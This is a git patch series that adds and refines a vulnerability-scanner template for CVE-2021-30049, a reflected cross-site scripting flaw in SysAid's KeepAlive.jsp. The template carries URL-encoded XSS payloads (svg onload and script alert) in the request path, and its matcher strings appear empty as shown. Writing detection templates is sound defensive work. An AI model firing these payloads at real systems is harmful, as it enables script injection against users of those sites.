From ffafbe02f6c44aeb22a98559eda295f0c2f59d93 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 17 Sep 2021 18:55:39 +0700 Subject: [PATCH 1/3] Create CVE-2021-30049.yaml --- cves/2021/CVE-2021-30049.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2021/CVE-2021-30049.yaml diff --git a/cves/2021/CVE-2021-30049.yaml b/cves/2021/CVE-2021-30049.yaml new file mode 100644 index 0000000000..d026454ff6 --- /dev/null +++ b/cves/2021/CVE-2021-30049.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-30049 + +info: + name: SysAid Technologies 20.3.64 b14 Reflected XSS + author: daffainfo + severity: medium + description: SysAid 20.3.64 b14 is affected by Cross Site Scripting (XSS) via a /KeepAlive.jsp?stamp= URI. + reference: + - https://eh337.net/2021/03/30/sysaid/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30049 + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%22%3E%3Csvg%20onload%3Dalert%281%29%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 2bed4d9a92069dbd82a367f1e3532b53e3dcc24f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 17 Sep 2021 18:57:55 +0700 Subject: [PATCH 2/3] Update CVE-2021-30049.yaml --- cves/2021/CVE-2021-30049.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/cves/2021/CVE-2021-30049.yaml b/cves/2021/CVE-2021-30049.yaml index d026454ff6..e10007469f 100644 --- a/cves/2021/CVE-2021-30049.yaml +++ b/cves/2021/CVE-2021-30049.yaml @@ -21,12 +21,10 @@ requests: part: body words: - "" - - type: word part: header words: - "text/html" - - type: status status: - 200 From 0d9d58a46bdb63f7f07fbc8d4b959705a0b89a3c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 17:56:34 +0530 Subject: [PATCH 3/3] Update CVE-2021-30049.yaml --- cves/2021/CVE-2021-30049.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-30049.yaml b/cves/2021/CVE-2021-30049.yaml index e10007469f..8ec071104b 100644 --- a/cves/2021/CVE-2021-30049.yaml +++ b/cves/2021/CVE-2021-30049.yaml @@ -13,18 +13,20 @@ info: requests: - method: GET path: - - '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%22%3E%3Csvg%20onload%3Dalert%281%29%3E' + - '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word - part: body words: - - "" + - "" + part: body + - type: word part: header words: - "text/html" + - type: status status: - 200